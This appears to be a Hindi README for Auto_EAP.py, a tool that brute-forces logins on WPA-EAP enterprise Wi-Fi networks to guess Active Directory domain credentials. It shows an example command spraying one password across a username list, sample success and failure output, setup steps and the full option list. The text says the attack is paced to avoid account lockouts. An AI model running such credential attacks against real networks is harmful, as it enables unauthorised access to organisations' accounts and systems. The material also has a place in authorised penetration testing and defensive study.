
EAP नेटवर्कों के विरुद्ध स्वचालित ब्रूट-फोर्स लॉगिन हमले
Auto_EAP.py एक स्क्रिप्ट है जो विभिन्न प्रकार के EAP नेटवर्कों पर स्वचालित ब्रूट-फोर्स प्रमाणीकरण हमले करने के लिए डिज़ाइन की गई है। इस प्रकार के वायरलेस नेटवर्क डोमेन क्रेडेंशियल्स के पासवर्ड अनुमान लगाने की सुविधा प्रदान करते हैं, क्योंकि रेडियस सर्वर Active Directory के विरुद्ध प्रमाणीकरण की जाँच करते हैं। पायथन लाइब्रेरी wpaspy का उपयोग करते हुए, जो Jouni Malinen [email protected] द्वारा बनाई गई है, wpa_supplicant डेमॉन के साथ बातचीत करने के लिए, स्वचालित प्रमाणीकरण हमले किए जा सकते हैं ताकि खाता लॉक-आउट न हों।
./Auto_EAP.py -s HoneyPot -K WPA-EAP -E PEAP -U test.txt -p Summer2016 -i wlan0
Initialized...
Trying Username Alice with Password test: SUCCESS
Trying Username Bob with Password test: FAILED
Trying Username Charles with Password test: FAILED
Trying Username David with Password test: SUCCESS
Completed
Auto_EAP के रूट डायरेक्टरी में 'RunMeFirst.py' चलाएँ। यह wpaspy लाइब्रेरी को कंपाइल करेगा और एक स्टैंड अलोन wpa_supplicant.conf फ़ाइल सेटअप करेगा जिसका उपयोग Auto_EAP.py परीक्षण के लिए करेगा, जबकि सिस्टम की wpa_supplicant कॉन्फ़िग फ़ाइल अछूती रहेगी।
./Auto_EAP.py -h
usage: Auto_EAP.py [-h] -i Interface -s SSID -U Usernamefile -p Password -K
Key_mgmt -E Eap_type
optional arguments:
-h, --help show this help message and exit
-i Interface, --interface Interface
The Interface to use
-s SSID, --ssid SSID The SSID to attack
-U Usernamefile, --User Usernamefile
Path to username file
-p Password, --password Password
Password to use
-K Key_mgmt, --key_mgmt Key_mgmt
Key_Management type to use
-E Eap_type, --eap_type Eap_type
Eap type to use